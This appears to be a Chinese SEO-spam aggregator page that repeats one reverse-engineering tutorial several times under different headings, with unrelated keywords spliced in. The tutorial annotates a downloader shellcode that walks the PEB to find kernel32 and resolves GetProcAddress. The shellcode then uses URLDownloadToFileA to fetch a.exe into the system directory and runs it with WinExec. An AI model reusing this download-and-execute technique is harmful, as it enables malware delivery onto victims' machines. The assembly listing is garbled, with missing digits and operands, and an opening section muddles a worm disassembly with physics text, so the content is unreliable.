皮皮网

【萌豆助手源码】【消灭病毒源码下载】【斗斗地主源码】cmps源码

2024-11-23 12:42:05 来源:码支付最新源码

1.冲击波病毒反汇编源码
2.十六进制代码怎么转换为hex文件?
3.十六进制编码的源码c语言是怎样的
4.hex文件如何反汇编?
5.hex是什么文件?
6.hex文件如何转化成C语言?

cmps源码

冲击波病毒反汇编源码

       以下是改写后的文章片段:

       反汇编源码中,指令执行了and操作:esi,源码esi,然后sbb指令减小bh寄存器的源码值。接着()执行了xor指令,源码将eax与4DC9DD3进行异或操作。源码

       中使用wait指令暂停程序,源码萌豆助手源码cli则关闭中断,源码然后()将ebp设置为FFD。源码A处的源码cmps指令用于比较ds:[esi]和es:[edi]的字节。

       后续的源码指令涉及到指令的跳转、数据移动、源码寄存器操作,源码如inc、源码dec、源码out、源码jpe、jnb等,它们执行了条件判断、内存操作和循环控制。例如,的jpe(跳跃到短地址AsmFun_v.)和B的loopd循环控制。

       源码的末尾,可以看到retn指令用于返回,还有一些未知命令和数据移动操作。整个代码段似乎是一个操作系统级的恶意代码,执行了一系列复杂的指令来实现特定功能。

       这段改写后的文章更加直观地描述了冲击波病毒反汇编源码中的一部分操作,展示了指令的执行流程和功能。

扩展资料

       冲击波,是一种不连续峰在介质中的传播,这个峰导致介质的压强、温度、密度等物理性质的跳跃式改变。通常指核爆炸时,爆炸中心压力急剧升高,使周围空气猛烈震荡而形成的波动。冲击波以超音速的速度从爆炸中心向周围冲击,具有很大的破坏力,是核爆炸重要的杀伤破坏因素之一。亦作爆炸波。也可以指指由超音速运动产生的强烈压缩气流。比喻义为使某种事物受到影响的强大力量而受到冲击。另有同名电脑病毒和**等。

十六进制代码怎么转换为hex文件?

       文件有两种,一种是文本文件,一种是程序二进制文件,不管哪种文件都可以用十六进制编码来显示,称为hex文件。

       1、文本Hex文件一般不需要转成C语言,更多的是程序二进制文件,用十六进制显示,可以转换成C语言,一般使用相应的反汇编程序来实现,这方面的工具很多,不同的平台略有不同。Windows平台一般常用的OllyDbg、Windbg、IDA,Linux平台使用最多的是GDB和Linux版的IDA。

       OllyDbg,简称OD,一般是软件逆向工程爱好者,最先使用的消灭病毒源码下载一个工具,但是因为当下不在更新,所以一般用一般用于学习使用,下图中左上角的区域即为反汇编区域 ,用户可以根据汇编指令,分析程序算法,然后自己编写代码。

        在Windows平台,特别是x平台,最好用的反汇编工具除还得是Windbg。将程序载入Windbg后,可以输入u命令来查看程序的反汇编代码。

       2、对于编程人员来说,逆向分析是一个基本的技能,但是往往不容易入门,这里举一个例子。以一段早些年ShellCode的十六进制代码为例,代码如下图所示,这段不起眼的代码,实际上实现了一个下载者的功能。

       拿到这样的十六进制代码,一般来说,先将其生成二进制文件,然后再分析其指令,通过反汇编指令再写出源码。只需要将上面的十六进制代码,保存到C语言的字符串数组中,写入到一个Exe的文件空段中,再修改指令将其跳转到程序入口处即可,这个过程类似于软件安全领域的壳。

       将十六进制代码写入一个exe文件后,就可以将exe文件载入动态调试器进行动态分析或者使用静态反汇编程序进行静态分析,两者的不同在于动态调试器是要运行程序的,而静态反汇编分析不需要运行程序,所以一般恶意程序,都采用静态分析。反汇编开头的一段十六进制代码注释如下:

       4AD    5A                     pop     edx                                           ; 函数返回的地址保存到edx中

       4AD    :A1          mov     eax, dword ptr fs:[]                        ; 取peb

       4AD    8B 0C                mov     eax, dword ptr [eax+C]                        ; peb_link

       4ADB    8B 1C                mov     esi, dword ptr [eax+1C]                       ; 初始化列表到esi

       4ADE    AD                     lods    dword ptr [esi]                               ; [esi]->eax + 8的位置即kernel.dll的地址

       4ADF    8B                 mov     eax, dword ptr [eax+8]                        ; eax=kernel.dll的地址

       4AD    8BD8                   mov     ebx, eax                                      ; ebx=kernel.dll的基址

       4AD    8B 3C                mov     esi, dword ptr [ebx+3C]                       ; esi = pe头偏移

       4AD    8BE               mov     esi, dword ptr [esi+ebx+]                   ; esi为kernel.dll导出表的偏移

       4ADB    F3                   add     esi, ebx                                      ; esi = kernel.dll导出表的虚拟地址

       4ADD    8B7E                 mov     edi, dword ptr [esi+]                       ; edi=ent的偏移地址

       4AD    FB                   add     edi, ebx                                      ; edi = ent的虚拟地址

       4AD    8B4E                 mov     ecx, dword ptr [esi+]                       ; ecx = kernel.dll导出地址的个数

       4AD    ED                   xor     ebp, ebp                                      ; ebp=0

       4AD                         push    esi                                           ; 保存导出表虚拟地址

       4AD                         push    edi                                           ; 保存ent虚拟地址

       4AD                         push    ecx                                           ; 保存计数

       4ADA    8B3F                   mov     edi, dword ptr [edi]

       4ADC    FB                   add     edi, ebx                                      ; 定位ent中的函数名

       4ADE    8BF2                   mov     esi, edx                                      ; esi为 要查询的函数GetProcAddress即该call的下一个地址是数据

       4AD    6A 0E                  push    0E                                            ; 0xe0是GetProcAddress函数的字符个数

       4AD                         pop     ecx                                           ; 设置循环次数为 0xe

       4AD    F3:A6                  repe    cmps byte ptr es:[edi], byte ptr [esi]        ; ecx!=0&&zf=1 ecx=ecx-1 cmps判断 GetProcAddress

       4AD                       je      short 4ADF                                ; 如果ENT中的函数名为GetProcAddress跳走

       4AD                         pop     ecx                                           ; 不相等则将导出地址数出栈

       4AD    5F                     pop     edi                                           ; ent虚拟地址出栈

       4AD    C7                 add     edi, 4                                        ; edi地址递增4字节 因为ENT的元素大小为4字节

       4ADC                         inc     ebp                                           ; ebp用于保存ent中定位到GetProcAddress函数时的计数

       4ADD  ^ E2 E9                  loopd   short 4AD                                ; 循环查询

       4ADF                         pop     ecx

       4AD    5F                     pop     edi

       4AD    5E                     pop     esi

       4AD    8BCD                   mov     ecx, ebp                                      ; 计数保存于ecx

       4AD    8B                 mov     eax, dword ptr [esi+]                       ; esi+0x Ordinal序号表偏移地址

       4AD    C3                   add     eax, ebx                                      ; ordinal序号表的虚拟地址

       4AD    D1E1                   shl     ecx, 1                                        ; ecx逻辑增加2倍  因为ordinal序号是WOR类型下面是通过add 来求ordinal所以这里必须扩大2倍

       4ADB    C1                   add     eax, ecx

       4ADD    C9                   xor     ecx, ecx                                      ; ecx=0

       4ADF    :8B                mov     cx, word ptr [eax]                            ; 保存取出的ordinal序号

       4AD    8B 1C                mov     eax, dword ptr [esi+1C]                       ; eax 为kenrnel.dll的EAT的偏移地址

       4AD >  C3                   add     eax, ebx                                      ; eax = kernel.dll的eat虚拟地址

       4AD    C1E1                 shl     ecx, 2                                        ; 同上,扩大4倍因为eat中元素为DWORD值

       4ADA    C1                   add     eax, ecx

       4ADC    8B                   mov     eax, dword ptr [eax]                          ; eax即为GetProcAddress函数的地址 相对虚拟地址,EAT中保存的RVA

       4ADE    C3                   add     eax, ebx                                      ; 与基址相加求得GetProcAddress函数的虚拟地址

       4AD    8BFA                   mov     edi, edx                                      ; GetProcAddress字符到edi

       4AD    8BF7                   mov     esi, edi                                      ; esi保存GetProcAddress地址

       4AD    C6 0E                add     esi, 0E                                       ; esi指向GetProcAddress字符串的末地址

       4AD    8BD0                   mov     edx, eax                                      ; edx为GetProcAddress的地址

       4AD    6A                   push    4

       4ADB                         pop     ecx                                           ; ecx=4

       有经验的程序员, 通过分析即明白上面反汇编代码的主要目的就是获取GetProcAddress函数的地址。继续看反汇编代码:

       4ADC    E8             call    4ADE1                                      ; 设置IAT 得到4个函数的地址

       4AD    C6 0D                add     esi, 0D                                       ; 从这里开始实现ShellCode的真正功能

       4AD                         push    edx

       4AD                         push    esi                                           ; urlmon

       4AD    FF FC                call    dword ptr [edi-4]                             ; 调用LoadLibrarA来加载urlmon.dll

       4AD    5A                     pop     edx                                           ; edx = GetProcAddress的地址

       4ADA    8BD8                   mov     ebx, eax

       4ADC    6A                   push    1

       4ADE                         pop     ecx

       4ADF    E8 3D            call    4ADE1                                      ; 再次设置 IAT 得到URLDownLoadToFileA

       4ADA4    C6                 add     esi,                                        ; esi指向URLDownLoadToFileA的末地址

       4ADA7                         push    esi

       4ADA8                         inc     esi

       4ADA9    E                 cmp     byte ptr [esi],                             ; 判断esi是否为0x 这里在原码中有0x如果要自己用,应该加上一个字节用于表示程序结束

       4ADAC  ^  FA                  jnz     short 4ADA8                                ; 跨过这个跳转,需要在OD中CTRL+E修改数据为0x

       4ADAE                     xor     byte ptr [esi], 

       4ADB1    5E                     pop     esi

       4ADB2    EC                 sub     esp,                                        ; 开辟  byte栈空间

       4ADB5 >  8BDC                   mov     ebx, esp                                      ; ebx为栈区的指针

       4ADB7    6A                   push    

       4ADB9                         push    ebx

       4ADBA    FF EC                call    dword ptr [edi-]                            ; 调用GetSystemDirectoryA得到系统目录

       4ADBD    C 5CE        mov     dword ptr [ebx+eax], EC                 ; ebx+0x 系统路径占 0x个字节

       4ADC4    C       mov     dword ptr [ebx+eax+4],                    ; 拼接下载后的文件路径%systemroot%\system\a.exe

       4ADCC    C0                   xor     eax, eax

       4ADCE                         push    eax

       4ADCF                         push    eax

       4ADD0                         push    ebx

       4ADD1                         push    esi

       4ADD2                         push    eax

       4ADD3 >  FF FC                call    dword ptr [edi-4]                             ; URLDownLoadToFile下载文件为a.exe

       4ADD6    8BDC                   mov     ebx, esp

       4ADD8                         push    eax

       4ADD9                         push    ebx

       4ADDA    FF F0                call    dword ptr [edi-]                            ; WinExec执行代码

       4ADDD                         push    eax

       4ADDE    FF F4                call    dword ptr [edi-C]                             ; ExitThread退出线程

       接下来的操作便是通过已获得地址的GetProcAddress()来分别得到GetSystemDirectory()、URLDownLoadToFile()、WinExec()及ExitProcess()函数的地址,并依次执行。到这里实际上有经验的程序员,马上就能写出C语言代码来。 后面的数据区不在分析了,主要是介绍如何操作。

       使用C语言,虽然知道了Hex文件的大致流程,但是一般来说,对于汇编指令,更倾向于直接使用asm关键字来使用内联汇编。如下图所示:

       通过这个实例 ,相信应该能理解一个大致的流程啦。

十六进制编码的c语言是怎样的

       文件有两种,一种是文本文件,一种是程序二进制文件,不管哪种文件都可以用十六进制编码来显示,称为hex文件。斗斗地主源码

       1、文本Hex文件一般不需要转成C语言,更多的是程序二进制文件,用十六进制显示,可以转换成C语言,一般使用相应的反汇编程序来实现,这方面的工具很多,不同的平台略有不同。Windows平台一般常用的OllyDbg、Windbg、IDA,Linux平台使用最多的是GDB和Linux版的IDA。

       OllyDbg,简称OD,一般是软件逆向工程爱好者,最先使用的一个工具,但是因为当下不在更新,所以一般用一般用于学习使用,下图中左上角的区域即为反汇编区域 ,用户可以根据汇编指令,分析程序算法,然后自己编写代码。

        在Windows平台,特别是x平台,最好用的反汇编工具除还得是Windbg。将程序载入Windbg后,可以输入u命令来查看程序的反汇编代码。

       2、对于编程人员来说,逆向分析是一个基本的技能,但是往往不容易入门,这里举一个例子。以一段早些年ShellCode的十六进制代码为例,代码如下图所示,这段不起眼的代码,实际上实现了一个下载者的功能。

       拿到这样的十六进制代码,一般来说,先将其生成二进制文件,然后再分析其指令,通过反汇编指令再写出源码。只需要将上面的十六进制代码,保存到C语言的字符串数组中,写入到一个Exe的文件空段中,再修改指令将其跳转到程序入口处即可,这个过程类似于软件安全领域的壳。

       将十六进制代码写入一个exe文件后,就可以将exe文件载入动态调试器进行动态分析或者使用静态反汇编程序进行静态分析,两者的不同在于动态调试器是要运行程序的,而静态反汇编分析不需要运行程序,所以一般恶意程序,都采用静态分析。反汇编开头的一段十六进制代码注释如下:

       4AD    5A                     pop     edx                                           ; 函数返回的地址保存到edx中

       4AD    :A1          mov     eax, dword ptr fs:[]                        ; 取peb

       4AD    8B 0C                mov     eax, dword ptr [eax+C]                        ; peb_link

       4ADB    8B 1C                mov     esi, dword ptr [eax+1C]                       ; 初始化列表到esi

       4ADE    AD                     lods    dword ptr [esi]                               ; [esi]->eax + 8的位置即kernel.dll的地址

       4ADF    8B                 mov     eax, dword ptr [eax+8]                        ; eax=kernel.dll的地址

       4AD    8BD8                   mov     ebx, eax                                      ; ebx=kernel.dll的基址

       4AD    8B 3C                mov     esi, dword ptr [ebx+3C]                       ; esi = pe头偏移

       4AD    8BE               mov     esi, dword ptr [esi+ebx+]                   ; esi为kernel.dll导出表的偏移

       4ADB    F3                   add     esi, ebx                                      ; esi = kernel.dll导出表的虚拟地址

       4ADD    8B7E                 mov     edi, dword ptr [esi+]                       ; edi=ent的偏移地址

       4AD    FB                   add     edi, ebx                                      ; edi = ent的虚拟地址

       4AD    8B4E                 mov     ecx, dword ptr [esi+]                       ; ecx = kernel.dll导出地址的个数

       4AD    ED                   xor     ebp, ebp                                      ; ebp=0

       4AD                         push    esi                                           ; 保存导出表虚拟地址

       4AD                         push    edi                                           ; 保存ent虚拟地址

       4AD                         push    ecx                                           ; 保存计数

       4ADA    8B3F                   mov     edi, dword ptr [edi]

       4ADC    FB                   add     edi, ebx                                      ; 定位ent中的函数名

       4ADE    8BF2                   mov     esi, edx                                      ; esi为 要查询的函数GetProcAddress即该call的下一个地址是数据

       4AD    6A 0E                  push    0E                                            ; 0xe0是GetProcAddress函数的字符个数

       4AD                         pop     ecx                                           ; 设置循环次数为 0xe

       4AD    F3:A6                  repe    cmps byte ptr es:[edi], byte ptr [esi]        ; ecx!=0&&zf=1 ecx=ecx-1 cmps判断 GetProcAddress

       4AD                       je      short 4ADF                                ; 如果ENT中的函数名为GetProcAddress跳走

       4AD                         pop     ecx                                           ; 不相等则将导出地址数出栈

       4AD    5F                     pop     edi                                           ; ent虚拟地址出栈

       4AD    C7                 add     edi, 4                                        ; edi地址递增4字节 因为ENT的元素大小为4字节

       4ADC                         inc     ebp                                           ; ebp用于保存ent中定位到GetProcAddress函数时的计数

       4ADD  ^ E2 E9                  loopd   short 4AD                                ; 循环查询

       4ADF                         pop     ecx

       4AD    5F                     pop     edi

       4AD    5E                     pop     esi

       4AD    8BCD                   mov     ecx, ebp                                      ; 计数保存于ecx

       4AD    8B                 mov     eax, dword ptr [esi+]                       ; esi+0x Ordinal序号表偏移地址

       4AD    C3                   add     eax, ebx                                      ; ordinal序号表的虚拟地址

       4AD    D1E1                   shl     ecx, 1                                        ; ecx逻辑增加2倍  因为ordinal序号是WOR类型下面是通过add 来求ordinal所以这里必须扩大2倍

       4ADB    C1                   add     eax, ecx

       4ADD    C9                   xor     ecx, ecx                                      ; ecx=0

       4ADF    :8B                mov     cx, word ptr [eax]                            ; 保存取出的ordinal序号

       4AD    8B 1C                mov     eax, dword ptr [esi+1C]                       ; eax 为kenrnel.dll的EAT的偏移地址

       4AD >  C3                   add     eax, ebx                                      ; eax = kernel.dll的eat虚拟地址

       4AD    C1E1                 shl     ecx, 2                                        ; 同上,扩大4倍因为eat中元素为DWORD值

       4ADA    C1                   add     eax, ecx

       4ADC    8B                   mov     eax, dword ptr [eax]                          ; eax即为GetProcAddress函数的地址 相对虚拟地址,EAT中保存的RVA

       4ADE    C3                   add     eax, ebx                                      ; 与基址相加求得GetProcAddress函数的虚拟地址

       4AD    8BFA                   mov     edi, edx                                      ; GetProcAddress字符到edi

       4AD    8BF7                   mov     esi, edi                                      ; esi保存GetProcAddress地址

       4AD    C6 0E                add     esi, 0E                                       ; esi指向GetProcAddress字符串的末地址

       4AD    8BD0                   mov     edx, eax                                      ; edx为GetProcAddress的地址

       4AD    6A                   push    4

       4ADB                         pop     ecx                                           ; ecx=4

       有经验的程序员, 通过分析即明白上面反汇编代码的主要目的就是获取GetProcAddress函数的地址。继续看反汇编代码:

       4ADC    E8             call    4ADE1                                      ; 设置IAT 得到4个函数的地址

       4AD    C6 0D                add     esi, 0D                                       ; 从这里开始实现ShellCode的真正功能

       4AD                         push    edx

       4AD                         push    esi                                           ; urlmon

       4AD    FF FC                call    dword ptr [edi-4]                             ; 调用LoadLibrarA来加载urlmon.dll

       4AD    5A                     pop     edx                                           ; edx = GetProcAddress的地址

       4ADA    8BD8                   mov     ebx, eax

       4ADC    6A                   push    1

       4ADE                         pop     ecx

       4ADF    E8 3D            call    4ADE1                                      ; 再次设置 IAT 得到URLDownLoadToFileA

       4ADA4    C6                 add     esi,                                        ; esi指向URLDownLoadToFileA的末地址

       4ADA7                         push    esi

       4ADA8                         inc     esi

       4ADA9    E                 cmp     byte ptr [esi],                             ; 判断esi是否为0x 这里在原码中有0x如果要自己用,应该加上一个字节用于表示程序结束

       4ADAC  ^  FA                  jnz     short 4ADA8                                ; 跨过这个跳转,需要在OD中CTRL+E修改数据为0x

       4ADAE                     xor     byte ptr [esi], 

       4ADB1    5E                     pop     esi

       4ADB2    EC                 sub     esp,                                        ; 开辟  byte栈空间

       4ADB5 >  8BDC                   mov     ebx, esp                                      ; ebx为栈区的指针

       4ADB7    6A                   push    

       4ADB9                         push    ebx

       4ADBA    FF EC                call    dword ptr [edi-]                            ; 调用GetSystemDirectoryA得到系统目录

       4ADBD    C 5CE        mov     dword ptr [ebx+eax], EC                 ; ebx+0x 系统路径占 0x个字节

       4ADC4    C       mov     dword ptr [ebx+eax+4],                    ; 拼接下载后的文件路径%systemroot%\system\a.exe

       4ADCC    C0                   xor     eax, eax

       4ADCE                         push    eax

       4ADCF                         push    eax

       4ADD0                         push    ebx

       4ADD1                         push    esi

       4ADD2                         push    eax

       4ADD3 >  FF FC                call    dword ptr [edi-4]                             ; URLDownLoadToFile下载文件为a.exe

       4ADD6    8BDC                   mov     ebx, esp

       4ADD8                         push    eax

       4ADD9                         push    ebx

       4ADDA    FF F0                call    dword ptr [edi-]                            ; WinExec执行代码

       4ADDD                         push    eax

       4ADDE    FF F4                call    dword ptr [edi-C]                             ; ExitThread退出线程

       接下来的操作便是通过已获得地址的GetProcAddress()来分别得到GetSystemDirectory()、URLDownLoadToFile()、WinExec()及ExitProcess()函数的地址,并依次执行。到这里实际上有经验的淘宝sign计算源码程序员,马上就能写出C语言代码来。 后面的数据区不在分析了,主要是介绍如何操作。

       使用C语言,虽然知道了Hex文件的大致流程,但是一般来说,对于汇编指令,更倾向于直接使用asm关键字来使用内联汇编。如下图所示:

       通过这个实例 ,相信应该能理解一个大致的流程啦。

hex文件如何反汇编?

       文件有两种,一种是文本文件,一种是程序二进制文件,不管哪种文件都可以用十六进制编码来显示,称为hex文件。

       1、文本Hex文件一般不需要转成C语言,更多的是程序二进制文件,用十六进制显示,可以转换成C语言,一般使用相应的反汇编程序来实现,这方面的工具很多,不同的平台略有不同。Windows平台一般常用的OllyDbg、Windbg、IDA,Linux平台使用最多的是GDB和Linux版的IDA。

       OllyDbg,简称OD,一般是软件逆向工程爱好者,最先使用的一个工具,但是因为当下不在更新,所以一般用一般用于学习使用,下图中左上角的区域即为反汇编区域 ,用户可以根据汇编指令,分析程序算法,然后自己编写代码。

        在Windows平台,特别是x平台,最好用的反汇编工具除还得是Windbg。将程序载入Windbg后,可以输入u命令来查看程序的反汇编代码。

       2、对于编程人员来说,逆向分析是一个基本的技能,但是往往不容易入门,这里举一个例子。以一段早些年ShellCode的十六进制代码为例,代码如下图所示,这段不起眼的代码,实际上实现了一个下载者的功能。

       拿到这样的十六进制代码,一般来说,先将其生成二进制文件,然后再分析其指令,通过反汇编指令再写出源码。只需要将上面的十六进制代码,保存到C语言的字符串数组中,写入到一个Exe的文件空段中,再修改指令将其跳转到程序入口处即可,这个过程类似于软件安全领域的壳。

       将十六进制代码写入一个exe文件后,就可以将exe文件载入动态调试器进行动态分析或者使用静态反汇编程序进行静态分析,老李收录网源码两者的不同在于动态调试器是要运行程序的,而静态反汇编分析不需要运行程序,所以一般恶意程序,都采用静态分析。反汇编开头的一段十六进制代码注释如下:

       4AD    5A                     pop     edx                                           ; 函数返回的地址保存到edx中

       4AD    :A1          mov     eax, dword ptr fs:[]                        ; 取peb

       4AD    8B 0C                mov     eax, dword ptr [eax+C]                        ; peb_link

       4ADB    8B 1C                mov     esi, dword ptr [eax+1C]                       ; 初始化列表到esi

       4ADE    AD                     lods    dword ptr [esi]                               ; [esi]->eax + 8的位置即kernel.dll的地址

       4ADF    8B                 mov     eax, dword ptr [eax+8]                        ; eax=kernel.dll的地址

       4AD    8BD8                   mov     ebx, eax                                      ; ebx=kernel.dll的基址

       4AD    8B 3C                mov     esi, dword ptr [ebx+3C]                       ; esi = pe头偏移

       4AD    8BE               mov     esi, dword ptr [esi+ebx+]                   ; esi为kernel.dll导出表的偏移

       4ADB    F3                   add     esi, ebx                                      ; esi = kernel.dll导出表的虚拟地址

       4ADD    8B7E                 mov     edi, dword ptr [esi+]                       ; edi=ent的偏移地址

       4AD    FB                   add     edi, ebx                                      ; edi = ent的虚拟地址

       4AD    8B4E                 mov     ecx, dword ptr [esi+]                       ; ecx = kernel.dll导出地址的个数

       4AD    ED                   xor     ebp, ebp                                      ; ebp=0

       4AD                         push    esi                                           ; 保存导出表虚拟地址

       4AD                         push    edi                                           ; 保存ent虚拟地址

       4AD                         push    ecx                                           ; 保存计数

       4ADA    8B3F                   mov     edi, dword ptr [edi]

       4ADC    FB                   add     edi, ebx                                      ; 定位ent中的函数名

       4ADE    8BF2                   mov     esi, edx                                      ; esi为 要查询的函数GetProcAddress即该call的下一个地址是数据

       4AD    6A 0E                  push    0E                                            ; 0xe0是GetProcAddress函数的字符个数

       4AD                         pop     ecx                                           ; 设置循环次数为 0xe

       4AD    F3:A6                  repe    cmps byte ptr es:[edi], byte ptr [esi]        ; ecx!=0&&zf=1 ecx=ecx-1 cmps判断 GetProcAddress

       4AD                       je      short 4ADF                                ; 如果ENT中的函数名为GetProcAddress跳走

       4AD                         pop     ecx                                           ; 不相等则将导出地址数出栈

       4AD    5F                     pop     edi                                           ; ent虚拟地址出栈

       4AD    C7                 add     edi, 4                                        ; edi地址递增4字节 因为ENT的元素大小为4字节

       4ADC                         inc     ebp                                           ; ebp用于保存ent中定位到GetProcAddress函数时的计数

       4ADD  ^ E2 E9                  loopd   short 4AD                                ; 循环查询

       4ADF                         pop     ecx

       4AD    5F                     pop     edi

       4AD    5E                     pop     esi

       4AD    8BCD                   mov     ecx, ebp                                      ; 计数保存于ecx

       4AD    8B                 mov     eax, dword ptr [esi+]                       ; esi+0x Ordinal序号表偏移地址

       4AD    C3                   add     eax, ebx                                      ; ordinal序号表的虚拟地址

       4AD    D1E1                   shl     ecx, 1                                        ; ecx逻辑增加2倍  因为ordinal序号是WOR类型下面是通过add 来求ordinal所以这里必须扩大2倍

       4ADB    C1                   add     eax, ecx

       4ADD    C9                   xor     ecx, ecx                                      ; ecx=0

       4ADF    :8B                mov     cx, word ptr [eax]                            ; 保存取出的ordinal序号

       4AD    8B 1C                mov     eax, dword ptr [esi+1C]                       ; eax 为kenrnel.dll的EAT的偏移地址

       4AD >  C3                   add     eax, ebx                                      ; eax = kernel.dll的eat虚拟地址

       4AD    C1E1                 shl     ecx, 2                                        ; 同上,扩大4倍因为eat中元素为DWORD值

       4ADA    C1                   add     eax, ecx

       4ADC    8B                   mov     eax, dword ptr [eax]                          ; eax即为GetProcAddress函数的地址 相对虚拟地址,EAT中保存的RVA

       4ADE    C3                   add     eax, ebx                                      ; 与基址相加求得GetProcAddress函数的虚拟地址

       4AD    8BFA                   mov     edi, edx                                      ; GetProcAddress字符到edi

       4AD    8BF7                   mov     esi, edi                                      ; esi保存GetProcAddress地址

       4AD    C6 0E                add     esi, 0E                                       ; esi指向GetProcAddress字符串的末地址

       4AD    8BD0                   mov     edx, eax                                      ; edx为GetProcAddress的地址

       4AD    6A                   push    4

       4ADB                         pop     ecx                                           ; ecx=4

       有经验的程序员, 通过分析即明白上面反汇编代码的主要目的就是获取GetProcAddress函数的地址。继续看反汇编代码:

       4ADC    E8             call    4ADE1                                      ; 设置IAT 得到4个函数的地址

       4AD    C6 0D                add     esi, 0D                                       ; 从这里开始实现ShellCode的真正功能

       4AD                         push    edx

       4AD                         push    esi                                           ; urlmon

       4AD    FF FC                call    dword ptr [edi-4]                             ; 调用LoadLibrarA来加载urlmon.dll

       4AD    5A                     pop     edx                                           ; edx = GetProcAddress的地址

       4ADA    8BD8                   mov     ebx, eax

       4ADC    6A                   push    1

       4ADE                         pop     ecx

       4ADF    E8 3D            call    4ADE1                                      ; 再次设置 IAT 得到URLDownLoadToFileA

       4ADA4    C6                 add     esi,                                        ; esi指向URLDownLoadToFileA的末地址

       4ADA7                         push    esi

       4ADA8                         inc     esi

       4ADA9    E                 cmp     byte ptr [esi],                             ; 判断esi是否为0x 这里在原码中有0x如果要自己用,应该加上一个字节用于表示程序结束

       4ADAC  ^  FA                  jnz     short 4ADA8                                ; 跨过这个跳转,需要在OD中CTRL+E修改数据为0x

       4ADAE                     xor     byte ptr [esi], 

       4ADB1    5E                     pop     esi

       4ADB2    EC                 sub     esp,                                        ; 开辟  byte栈空间

       4ADB5 >  8BDC                   mov     ebx, esp                                      ; ebx为栈区的指针

       4ADB7    6A                   push    

       4ADB9                         push    ebx

       4ADBA    FF EC                call    dword ptr [edi-]                            ; 调用GetSystemDirectoryA得到系统目录

       4ADBD    C 5CE        mov     dword ptr [ebx+eax], EC                 ; ebx+0x 系统路径占 0x个字节

       4ADC4    C       mov     dword ptr [ebx+eax+4],                    ; 拼接下载后的文件路径%systemroot%\system\a.exe

       4ADCC    C0                   xor     eax, eax

       4ADCE                         push    eax

       4ADCF                         push    eax

       4ADD0                         push    ebx

       4ADD1                         push    esi

       4ADD2                         push    eax

       4ADD3 >  FF FC                call    dword ptr [edi-4]                             ; URLDownLoadToFile下载文件为a.exe

       4ADD6    8BDC                   mov     ebx, esp

       4ADD8                         push    eax

       4ADD9                         push    ebx

       4ADDA    FF F0                call    dword ptr [edi-]                            ; WinExec执行代码

       4ADDD                         push    eax

       4ADDE    FF F4                call    dword ptr [edi-C]                             ; ExitThread退出线程

       接下来的操作便是通过已获得地址的GetProcAddress()来分别得到GetSystemDirectory()、URLDownLoadToFile()、WinExec()及ExitProcess()函数的地址,并依次执行。到这里实际上有经验的程序员,马上就能写出C语言代码来。 后面的数据区不在分析了,主要是介绍如何操作。

       使用C语言,虽然知道了Hex文件的大致流程,但是一般来说,对于汇编指令,更倾向于直接使用asm关键字来使用内联汇编。如下图所示:

       通过这个实例 ,相信应该能理解一个大致的流程啦。

hex是什么文件?

       文件有两种,一种是文本文件,一种是程序二进制文件,不管哪种文件都可以用十六进制编码来显示,称为hex文件。

       1、文本Hex文件一般不需要转成C语言,更多的是程序二进制文件,用十六进制显示,可以转换成C语言,一般使用相应的反汇编程序来实现,这方面的工具很多,不同的平台略有不同。Windows平台一般常用的OllyDbg、Windbg、IDA,Linux平台使用最多的是GDB和Linux版的IDA。

       OllyDbg,简称OD,一般是软件逆向工程爱好者,最先使用的一个工具,但是因为当下不在更新,所以一般用一般用于学习使用,下图中左上角的区域即为反汇编区域 ,用户可以根据汇编指令,分析程序算法,然后自己编写代码。

        在Windows平台,特别是x平台,最好用的反汇编工具除还得是Windbg。将程序载入Windbg后,可以输入u命令来查看程序的反汇编代码。

       2、对于编程人员来说,逆向分析是一个基本的技能,但是往往不容易入门,这里举一个例子。以一段早些年ShellCode的十六进制代码为例,代码如下图所示,这段不起眼的代码,实际上实现了一个下载者的功能。

       拿到这样的十六进制代码,一般来说,先将其生成二进制文件,然后再分析其指令,通过反汇编指令再写出源码。只需要将上面的十六进制代码,保存到C语言的字符串数组中,写入到一个Exe的文件空段中,再修改指令将其跳转到程序入口处即可,这个过程类似于软件安全领域的壳。

       将十六进制代码写入一个exe文件后,就可以将exe文件载入动态调试器进行动态分析或者使用静态反汇编程序进行静态分析,两者的不同在于动态调试器是要运行程序的,而静态反汇编分析不需要运行程序,所以一般恶意程序,都采用静态分析。反汇编开头的一段十六进制代码注释如下:

       4AD    5A                     pop     edx                                           ; 函数返回的地址保存到edx中

       4AD    :A1          mov     eax, dword ptr fs:[]                        ; 取peb

       4AD    8B 0C                mov     eax, dword ptr [eax+C]                        ; peb_link

       4ADB    8B 1C                mov     esi, dword ptr [eax+1C]                       ; 初始化列表到esi

       4ADE    AD                     lods    dword ptr [esi]                               ; [esi]->eax + 8的位置即kernel.dll的地址

       4ADF    8B                 mov     eax, dword ptr [eax+8]                        ; eax=kernel.dll的地址

       4AD    8BD8                   mov     ebx, eax                                      ; ebx=kernel.dll的基址

       4AD    8B 3C                mov     esi, dword ptr [ebx+3C]                       ; esi = pe头偏移

       4AD    8BE               mov     esi, dword ptr [esi+ebx+]                   ; esi为kernel.dll导出表的偏移

       4ADB    F3                   add     esi, ebx                                      ; esi = kernel.dll导出表的虚拟地址

       4ADD    8B7E                 mov     edi, dword ptr [esi+]                       ; edi=ent的偏移地址

       4AD    FB                   add     edi, ebx                                      ; edi = ent的虚拟地址

       4AD    8B4E                 mov     ecx, dword ptr [esi+]                       ; ecx = kernel.dll导出地址的个数

       4AD    ED                   xor     ebp, ebp                                      ; ebp=0

       4AD                         push    esi                                           ; 保存导出表虚拟地址

       4AD                         push    edi                                           ; 保存ent虚拟地址

       4AD                         push    ecx                                           ; 保存计数

       4ADA    8B3F                   mov     edi, dword ptr [edi]

       4ADC    FB                   add     edi, ebx                                      ; 定位ent中的函数名

       4ADE    8BF2                   mov     esi, edx                                      ; esi为 要查询的函数GetProcAddress即该call的下一个地址是数据

       4AD    6A 0E                  push    0E                                            ; 0xe0是GetProcAddress函数的字符个数

       4AD                         pop     ecx                                           ; 设置循环次数为 0xe

       4AD    F3:A6                  repe    cmps byte ptr es:[edi], byte ptr [esi]        ; ecx!=0&&zf=1 ecx=ecx-1 cmps判断 GetProcAddress

       4AD                       je      short 4ADF                                ; 如果ENT中的函数名为GetProcAddress跳走

       4AD                         pop     ecx                                           ; 不相等则将导出地址数出栈

       4AD    5F                     pop     edi                                           ; ent虚拟地址出栈

       4AD    C7                 add     edi, 4                                        ; edi地址递增4字节 因为ENT的元素大小为4字节

       4ADC                         inc     ebp                                           ; ebp用于保存ent中定位到GetProcAddress函数时的计数

       4ADD  ^ E2 E9                  loopd   short 4AD                                ; 循环查询

       4ADF                         pop     ecx

       4AD    5F                     pop     edi

